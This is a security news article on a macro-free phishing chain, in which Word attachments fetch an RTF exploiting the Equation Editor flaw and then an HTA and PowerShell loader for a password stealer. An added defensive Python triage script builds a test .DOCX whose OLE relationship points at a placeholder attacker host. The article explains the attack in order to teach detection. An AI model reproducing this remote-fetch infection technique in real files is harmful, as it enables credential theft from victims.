Malicious Microsoft Office attachments trick their victims




     Malicious Microsoft Office attachments usually require the attacker to trick the victim into enabling macros. A newly reported malicious email campaign instead uses Office attachments that contain no macros at all. Because nothing has to be enabled, the attack never triggers the macro security warning that Microsoft Office shows for macro-based attacks: when the victim opens the attachment, there are no warnings or pop-ups at all.

     The attack uses malicious Word attachments that start a four-stage infection chain, which ultimately exploits the Office Equation Editor vulnerability that Microsoft patched last year. The final payload is designed to steal credentials from the victim's email clients, FTP clients and browsers. Many researchers have compared the layered nature of the attack to a turducken. Researchers state that the chain uses a combination of techniques that begins with a .DOCX attachment. The spam originates from the Necurs botnet. Email subject lines fall into four finance-themed categories: "TNT STATEMENT OF ACCOUNT", "Request for Quotation", "Telex Transfer Notification" and "SWIFT COPY FOR BALANCE PAYMENT." All of the emails carried an attachment named receipt.docx.




     The multi-stage infection process begins when the .DOCX file is opened and triggers an embedded OLE object that contains an external reference. A .DOCX is an OpenXML package, and its relationships part (word/_rels/document.xml.rels) is allowed to point at remote OLE objects; Word resolves such a reference automatically when the document is rendered. According to security experts, the attackers are taking advantage of the fact that Microsoft Office 2007 and later use the OpenXML format, which is built on XML and ZIP archive technologies and can easily be manipulated programmatically or by hand. A practitioner triaging a suspect .DOCX can therefore unzip it and look for a Relationship entry with TargetMode="External" whose target is an http(s) URL; a legitimate receipt has no reason to pull an OLE object from the internet.

     In the next stage, the .DOCX file triggers the download of an RTF file. When the user opens the .DOCX, it fetches a remote document from the URL http://gamestoredownload(.)download/WS-word2017pa(.)doc. Despite the .doc extension, this is actually an RTF file, which is downloaded and opened. The RTF file then exploits the Office Equation Editor vulnerability, which Microsoft patched in November. The Office Equation Editor is the component used to insert and edit complex equations as OLE items in Microsoft Word documents.

     In the following stage, text inside the RTF file is decoded and in turn triggers an MSHTA command line that downloads and executes an HTML Application (HTA) file. The HTA then runs an obfuscated PowerShell script which downloads and executes the remote payload, the password-stealer malware. The malware harvests credentials from email, FTP and browser programs: it assembles the relevant strings in memory and uses the Windows APIs RegOpenKeyExW and PathFileExistsW to check whether the registry keys or file paths of the various target programs exist before reading them.
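The two indicators a defender can check offline for the first two stages are the external OLE relationship inside the .DOCX package and the Equation Editor object inside the downloaded RTF. The following is an added example written for this page, not code from the article or the researchers it cites. It builds a constructed, minimal .DOCX (not the real receipt.docx) whose word/_rels/document.xml.rels points at a placeholder URL, http://attacker.example/remote.doc (an assumption, not the campaign's URL), and shows how to flag it; the RTF check looks for an embedded object of class Equation.3, the Equation Editor's ProgID. Both checks are triage indicators, not verdicts, because legitimate documents can contain equations and external links.

```python
"""Offline triage helpers for the DOCX -> RTF -> Equation Editor chain.

Added example for this article; not code from the original page.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
STYLES_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"
RELS_PART = "word/_rels/document.xml.rels"

# Equation Editor objects are declared in RTF as \objclass Equation.3.
# Real samples often pad or obfuscate this, so allow optional whitespace.
EQUATION_OBJ = re.compile(rb"\\objclass\s*Equation\.3", re.IGNORECASE)


def external_relationships(docx_bytes):
    """Return (rel_id, short_type, target) for every relationship in
    word/_rels/document.xml.rels marked TargetMode="External".

    An oleObject relationship whose target is an http(s) URL is the
    remote OLE reference that kicks off the chain in the article.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if RELS_PART not in zf.namelist():
            return findings
        root = ET.fromstring(zf.read(RELS_PART))
    for rel in root.iter(f"{{{REL_NS}}}Relationship"):
        if rel.get("TargetMode") != "External":
            continue
        short_type = rel.get("Type", "").rsplit("/", 1)[-1]
        findings.append((rel.get("Id"), short_type, rel.get("Target", "")))
    return findings


def docx_has_remote_ole(docx_bytes):
    """True if the package references an OLE object over http(s)."""
    return any(
        short_type == "oleObject"
        and target.lower().startswith(("http://", "https://"))
        for _, short_type, target in external_relationships(docx_bytes)
    )


def rtf_embeds_equation_object(data):
    """True if an RTF blob declares an embedded Equation.3 OLE object.

    Word also accepts headers as short as "{\\rt", which malicious RTF
    files sometimes use, so do not insist on the full "{\\rtf1".
    """
    return data.lstrip().startswith(b"{\\rt") and bool(EQUATION_OBJ.search(data))


def build_sample_docx(target):
    """Construct a minimal DOCX whose relationships part points an OLE
    object at `target`.  This is constructed test input for the example,
    not the campaign's receipt.docx.
    """
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{STYLES_TYPE}" Target="styles.xml"/>'
        f'<Relationship Id="rId2" Type="{OLE_TYPE}" Target="{target}" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml",
                    '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr(RELS_PART, rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder URL, an assumption for this example only.
    sample = build_sample_docx("http://attacker.example/remote.doc")
    for rel_id, short_type, target in external_relationships(sample):
        print(f"{rel_id}: {short_type} -> {target}")
    print("remote OLE object:", docx_has_remote_ole(sample))
    # Constructed RTF fragment with an Equation Editor object declaration.
    rtf = b"{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata 0105}}}"
    print("Equation.3 object in RTF:", rtf_embeds_equation_object(rtf))
```

On a mail gateway the same two functions can run against every .docx and every .doc/.rtf attachment regardless of extension; the RTF check is keyed on the content, not the file name, precisely because the campaign serves RTF under a .doc name.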

     The number of stages and the variety of techniques chained together in these attacks are unusual. Another point is that the attack relies on file types (DOCX, RTF and HTA) that email and network gateways rarely block, unlike the more obvious scripting formats such as VBS, JScript or WSF. The defensive takeaways are the ones that keep applying: be careful about opening unexpected Office documents, even ones that show no macro warning, and keep Office patched, since the chain depends on an Equation Editor flaw that has already been fixed.